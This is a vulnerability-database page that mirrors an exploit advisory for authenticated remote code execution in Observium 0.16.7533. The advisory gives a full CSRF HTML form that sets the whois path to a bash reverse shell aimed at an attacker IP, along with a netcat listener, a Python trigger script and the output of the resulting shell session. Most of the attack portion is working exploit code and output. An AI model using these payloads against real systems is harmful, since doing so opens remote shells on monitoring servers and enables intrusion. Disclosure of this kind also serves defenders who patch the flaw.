Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Observium 0.16.7533 Code Execution / Cross Site Request Forgery

🗓️ 30 Apr 2016 00:00:00Reported by Dolev FarhiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

Observium Commercial authenticated remote code execution through CSRF or editing the whois binary field

Code
`# Exploit title: Observium Commercial - Authenticated RCE  
# Author: Dolev Farhi  
# Contact: dolevf at protonmail.com  
# Date: 28-04-2016  
# Vendor homepage: http://observium.org/  
# Software version: CE 0.16.7533  
  
Authenticated remote code execution  
Using either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8  
using any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener  
  
root@pt:~# nc -lvp 4444  
listening on [any] 4444 ...  
  
and a CSRF which looks like this:  
  
<!--   
<html>  
<div align="center">  
<pre>  
  
<h2><b>CSRF<b></h2>  
<body>  
<form  
action="http://<observiumIP>/settings/section=paths/"  
method="POST">  
<input type="hidden" name="temp_dir" value="" />  
<input type="hidden" name="varset_temp_dir" value="" />  
<input type="hidden" name="varset_rrdtool" value="" />  
<input type="hidden" name="fping" value="" />  
<input type="hidden" name="varset_fping" value="" />  
<input type="hidden" name="fping6" value="" />  
<input type="hidden" name="varset_fping6" value="" />  
<input type="hidden" name="svn" value="" />  
<input type="hidden" name="varset_svn" value="" />  
<input type="hidden" name="snmpget" value="" />  
<input type="hidden" name="varset_snmpget" value="" />  
<input type="hidden" name="snmpwalk" value="" />  
<input type="hidden" name="varset_snmpwalk" value="" />  
<input type="hidden" name="snmpbulkget" value="" />  
<input type="hidden" name="varset_snmpbulkget" value="" />  
<input type="hidden" name="snmpbulkwalk" value="" />  
<input type="hidden" name="varset_snmpbulkwalk" value="" />  
<input type="hidden" name="snmptranslate" value="" />  
<input type="hidden" name="varset_snmptranslate" value="" />  
<input type="hidden" name="ipmitool" value="" />  
<input type="hidden" name="varset_ipmitool" value="" />  
<input type="hidden" name="virsh" value="" />  
<input type="hidden" name="varset_virsh" value="" />  
<input type="hidden" name="wmic" value="" />  
<input type="hidden" name="varset_wmic" value="" />  
<input type="hidden" name="git" value="" />  
<input type="hidden" name="varset_git" value="" />  
<input type="hidden" name="whois" value="bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit" />  
<input type="hidden" name="varset_whois" value="" />  
<input type="hidden" name="whois_custom" value="1" />  
<input type="hidden" name="file" value="" />  
<input type="hidden" name="varset_file" value="" />  
<input type="hidden" name="dot" value="" />  
<input type="hidden" name="varset_dot" value="" />  
<input type="submit" name="submit" value="save" />  
</form>  
</body>  
</div>  
</html>  
  
or by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit' and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the   
whois parameter which gives us a reverse shell on the machine:  
  
you may also use the following python instead:  
  
"""  
import sys  
import urllib  
import urllib2  
import cookielib  
  
#!/usr/bin/python   
username = 'test'  
password = '123456'  
timeout = 10  
  
try:  
cj = cookielib.CookieJar()  
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))  
login_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''})  
opener.open('http://observium-server', login_data, timeout=timeout)  
url = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8'  
resp = opener.open(url)  
  
except Exception, e:  
print e  
sys.exit(1)  
"""  
  
listening on [any] 4444 ...  
192.168.2.155: inverse host lookup failed: Unknown host  
connect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413  
bash: no job control in this shell  
bash: /root/.bashrc: Permission denied  
bash-4.1$ ls -l /opt  
ls -l /opt  
total 48944  
drwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium  
-rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz  
drwxr-xr-x. 2 root root 4096 Mar 26 2015 rh  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Apr 2016 00:00Current
0.2Low risk
Vulners AI Score0.2
observiumremote code executioncsrfeditingwhoisbash command
26